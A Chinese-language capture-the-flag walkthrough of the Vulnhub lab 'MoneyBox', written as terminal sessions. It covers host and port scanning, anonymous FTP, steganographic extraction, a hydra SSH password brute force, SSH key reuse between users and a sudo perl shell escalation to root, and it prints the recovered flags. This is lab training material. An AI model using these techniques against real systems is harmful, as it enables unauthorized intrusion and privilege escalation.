Vulnhub之Monkeybox详细测试过程(不同的Shell获取路径)

Monkeybox

识别目标主机IP地址

─(kali㉿kali)-[~/Desktop/Vulnhub/Monkeybox]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: Finished!   |   Screen View: Unique Hosts                                                                                              
                                                                                                                                                            
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                                                            
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:11      1      60  Unknown vendor                                                                                           
 192.168.56.100  08:00:27:10:8b:6f      1      60  PCS Systemtechnik GmbH                                                                                   
 192.168.56.244  08:00:27:ce:e9:a8      1      60  PCS Systemtechnik GmbH                                                                                   


利用Kali Linux的netdiscover工具识别目标主机的IP地址为192.168.56.244

NMAP扫描

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Monkeybox]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.244 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2023-04-05 21:45 EDT
Nmap scan report for bogon (192.168.56.244)
Host is up (0.00021s latency).
Not shown: 65532 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:192.168.56.230
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 4
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--    1 0        0         1093656 Feb 26  2021 trytofind.jpg
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 1e:30:ce:72:81:e0:a2:3d:5c:28:88:8b:12:ac:fa:ac (RSA)
|   256 01:9d:fa:fb:f2:06:37:c0:12:fc:01:8b:24:8f:53:ae (ECDSA)
|_  256 2f:34:b3:d0:74:b4:7f:8d:17:d2:37:b1:2e:32:f7:eb (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-title: MoneyBox
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:CE:E9:A8 (Oracle VirtualBox virtual NIC)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.33 seconds

NMAP扫描结果表明目标主机有3个开放端口:21(ftp)、22(ssh)、80(http)

获得Shell

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Monkeybox]
└─$ ftp 192.168.56.244
Connected to 192.168.56.244.
220 (vsFTPd 3.0.3)
Name (192.168.56.244:kali): anonymous
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -alh
229 Entering Extended Passive Mode (|||6250|)
150 Here comes the directory listing.
drwxr-xr-x    2 0        0            4096 Feb 26  2021 .
drwxr-xr-x    2 0        0            4096 Feb 26  2021 ..
-rw-r--r--    1 0        0         1093656 Feb 26  2021 trytofind.jpg
226 Directory send OK.
ftp> get trytofind.jpg
local: trytofind.jpg remote: trytofind.jpg
229 Entering Extended Passive Mode (|||34432|)
150 Opening BINARY mode data connection for trytofind.jpg (1093656 bytes).
100% |****************************************************************************************************************|  1068 KiB    7.82 MiB/s    00:00 ETA
226 Transfer complete.
1093656 bytes received in 00:00 (7.79 MiB/s)
ftp> put test.txt 
local: test.txt remote: test.txt
229 Entering Extended Passive Mode (|||17931|)
550 Permission denied.

  1. 目标主机允许匿名FTP访问

  2. 不允许匿名用户上传文件

  3. FTP服务版本没有漏洞可利用

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Monkeybox]
└─$ steghide extract -sf trytofind.jpg                         
Enter passphrase: 
                                                                                                                                                             
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Monkeybox]
└─$ stegseek trytofind.jpg            
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek

[i] Progress: 99.72% (133.1 MB)           
[!] error: Could not find a valid passphrase.
                                                                                                                                                             
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Monkeybox]
└─$ exiftool trytofind.jpg       
ExifTool Version Number         : 12.44
File Name                       : trytofind.jpg
Directory                       : .
File Size                       : 1094 kB
File Modification Date/Time     : 2021:02:26 04:48:17-05:00
File Access Date/Time           : 2023:04:05 21:48:25-04:00
File Inode Change Date/Time     : 2023:04:05 21:48:25-04:00
File Permissions                : -rw-r--r--
File Type                       : JPEG
File Type Extension             : jpg
MIME Type                       : image/jpeg
JFIF Version                    : 1.01
Resolution Unit                 : inches
X Resolution                    : 72
Y Resolution                    : 72
Image Width                     : 3984
Image Height                    : 2988
Encoding Process                : Baseline DCT, Huffman coding
Bits Per Sample                 : 8
Color Components                : 3
Y Cb Cr Sub Sampling            : YCbCr4:2:0 (2 2)
Image Size                      : 3984x2988
Megapixels                      : 11.9
                                                                                                                                                             
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Monkeybox]
└─$ binwalk -e trytofind.jpg 

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0             0x0             JPEG image data, JFIF standard 1.01

对FTP下载下来的文件没有分析出有价值的信息。

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Monkeybox]
└─$ gobuster dir -u http://192.168.56.244 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.sh,.js,.txt     
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.244
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Extensions:              php,html,sh,js,txt
[+] Timeout:                 10s
===============================================================
2023/04/05 21:53:48 Starting gobuster in directory enumeration mode
===============================================================
/.html                (Status: 403) [Size: 279]
/index.html           (Status: 200) [Size: 621]
/blogs                (Status: 301) [Size: 316] [--> http://192.168.56.244/blogs/]
Progress: 222012 / 1323366 (16.78%)^C
[!] Keyboard interrupt detected, terminating.


gobuster工具识别出目录/blogs

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Monkeybox]
└─$ curl http://192.168.56.244/blogs/    
<html>
<head><title>MoneyBox</title></head>
<body>
    <h1>I'm T0m-H4ck3r</h1><br>
        <p>I Already Hacked This Box and Informed.But They didn't Do any Security configuration</p>
        <p>If You Want Hint For Next Step......?<p>
</body>
</html>

<!--the hint is the another secret directory is S3cr3t-T3xt-->


┌──(kali㉿kali)-[~/Desktop/Vulnhub/Monkeybox]
└─$ curl http://192.168.56.244/S3cr3t-T3xt/
<html>
<head><title>MoneyBox</title></head>
<body>
    <h1>There is Nothing In this Page.........</h1>
</body>
</html>


<!..Secret Key 3xtr4ctd4t4 >


这会不会是图片的密码?

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Monkeybox]
└─$ steghide extract -sf trytofind.jpg
Enter passphrase: 
wrote extracted data to "data.txt".
                                                                                                                                                             
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Monkeybox]
└─$ ls -alh
total 1.1M
drwxr-xr-x  2 kali kali 4.0K Apr  5 22:00 .
drwxr-xr-x 19 kali kali 4.0K Apr  5 21:43 ..
-rw-r--r--  1 kali kali  136 Apr  5 22:00 data.txt
-rw-r--r--  1 root root 1.5K Apr  5 21:45 nmap_full_scan
-rw-r--r--  1 kali kali   12 Apr  5 21:48 test.txt
-rw-r--r--  1 kali kali 1.1M Feb 26  2021 trytofind.jpg
                                                                                                                                                             
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Monkeybox]
└─$ cat data.txt                           
Hello.....  renu

      I tell you something Important.Your Password is too Week So Change Your Password
Don't Underestimate it.......

说明两件事情:

  1. 用户名renu

  2. 密码比较弱,可以破解

但是不知道是FTP还是ssh,先尝试ssh

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Monkeybox]
└─$ hydra -l renu -P /usr/share/wordlists/rockyou.txt ssh://192.168.56.244
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-04-05 22:01:46
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://192.168.56.244:22/
[22][ssh] host: 192.168.56.244   login: renu   password: 987654321
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 3 final worker threads did not complete until end.
[ERROR] 3 targets did not resolve or could not be connected
[ERROR] 0 target did not complete

成功得到了用户renu的密码

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Monkeybox]
└─$ ssh renu@192.168.56.244           
renu@192.168.56.244's password: 
Linux MoneyBox 4.19.0-14-amd64 #1 SMP Debian 4.19.171-2 (2021-01-30) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri Feb 26 08:53:43 2021 from 192.168.43.44
renu@MoneyBox:~$ id
uid=1001(renu) gid=1001(renu) groups=1001(renu)
renu@MoneyBox:~$ ls -alh
total 40K
drwxr-xr-x 5 renu renu 4.0K Feb 26  2021 .
drwxr-xr-x 4 root root 4.0K Feb 26  2021 ..
-rw------- 1 renu renu  642 Feb 26  2021 .bash_history
-rw-r--r-- 1 renu renu  220 Apr 17  2019 .bash_logout
-rw-r--r-- 1 renu renu 3.5K Apr 17  2019 .bashrc
drwxr-xr-x 3 root root 4.0K Feb 26  2021 ftp
drwxr-xr-x 3 renu renu 4.0K Feb 26  2021 .local
-rw-r--r-- 1 renu renu  807 Apr 17  2019 .profile
drwx------ 2 renu renu 4.0K Feb 26  2021 .ssh
-rw-r--r-- 1 renu renu   64 Feb 26  2021 user1.txt
renu@MoneyBox:~$ cat user1.txt 
Yes...!
You Got it User1 Flag

 ==> us3r1{F14g:0ku74tbd3777y4}


renu@MoneyBox:~$ cat .bash_history 
cler
ls
ls -la
cd /home
ls
clear
cd
ls
ls -la
exit
clear
ls
ls -la
cd /home
ls
cd lily
ls
ls -la
clear
cd
clear
ssh-keygen -t rsa
clear
cd .ssh
ls
ssh-copy-id lily@192.168.43.80
clear
cd
cd -
ls -l
chmod 400 id_rsa
ls -l
ssh -i id_rsa lily@192.168.43.80
clear
ssh -i id_rsa lily@192.168.43.80
cd
clear
cd .ssh/
ls
ssh -i id_rsa lily@192.168.43.80
su lily
clear
cd
sudo apt install openssh
sudo apt update
sudo apt install openssh-server
sudo service ssh start
sudo service ssh status
clear
cd /etc/
ls
cd ssh
ls
nano ssh_config 
ls
nano sshd_config 
clear
cd
ls
ls -la
chsh bash
chsh
clear
su root
clear
sudo apt install openssh
su root
exit

从用户renu的历史命令可知,可以ssh到另一个用户lily

renu@MoneyBox:~$ cd /home
renu@MoneyBox:/home$ ls -alh
total 16K
drwxr-xr-x  4 root root 4.0K Feb 26  2021 .
drwxr-xr-x 18 root root 4.0K Feb 25  2021 ..
drwxr-xr-x  4 lily lily 4.0K Feb 26  2021 lily
drwxr-xr-x  5 renu renu 4.0K Feb 26  2021 renu
renu@MoneyBox:/home$ cd renu/.ssh/
renu@MoneyBox:~/.ssh$ ssh -i id_rsa lily@192.168.56.244
The authenticity of host '192.168.56.244 (192.168.56.244)' can't be established.
ECDSA key fingerprint is SHA256:8GzSoXjLv35yJ7cQf1EE0rFBb9kLK/K1hAjzK/IXk8I.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.56.244' (ECDSA) to the list of known hosts.
Linux MoneyBox 4.19.0-14-amd64 #1 SMP Debian 4.19.171-2 (2021-01-30) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri Feb 26 09:07:47 2021 from 192.168.43.80
lily@MoneyBox:~$ id
uid=1000(lily) gid=1000(lily) groups=1000(lily),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)

lily@MoneyBox:~$ cat user2.txt 
Yeah.....
You Got a User2 Flag

==> us3r{F14g:tr5827r5wu6nklao}

得到了第2个flag

提权

lily@MoneyBox:~$ sudo -l
Matching Defaults entries for lily on MoneyBox:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User lily may run the following commands on MoneyBox:
    (ALL : ALL) NOPASSWD: /usr/bin/perl

参考GTFOBINS网站的方法进行提权:

lily@MoneyBox:~$ sudo /usr/bin/perl -e 'exec "/bin/sh";'
# cd /root
# ls -alh
total 28K
drwx------  3 root root 4.0K Feb 26  2021 .
drwxr-xr-x 18 root root 4.0K Feb 25  2021 ..
-rw-------  1 root root 2.1K Feb 26  2021 .bash_history
-rw-r--r--  1 root root  570 Jan 31  2010 .bashrc
drwxr-xr-x  3 root root 4.0K Feb 25  2021 .local
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
-rw-r--r--  1 root root  228 Feb 26  2021 .root.txt
# cat .root.txt

Congratulations.......!

You Successfully completed MoneyBox

Finally The Root Flag
    ==> r00t{H4ckth3p14n3t}

I'm Kirthik-KarvendhanT
    It's My First CTF Box
         
instagram : ____kirthik____

See You Back....
       
# 

至此得到了root shell以及root flag

热门相关:斗神战帝   寂静王冠   苏醒的秘密   霸皇纪   大神你人设崩了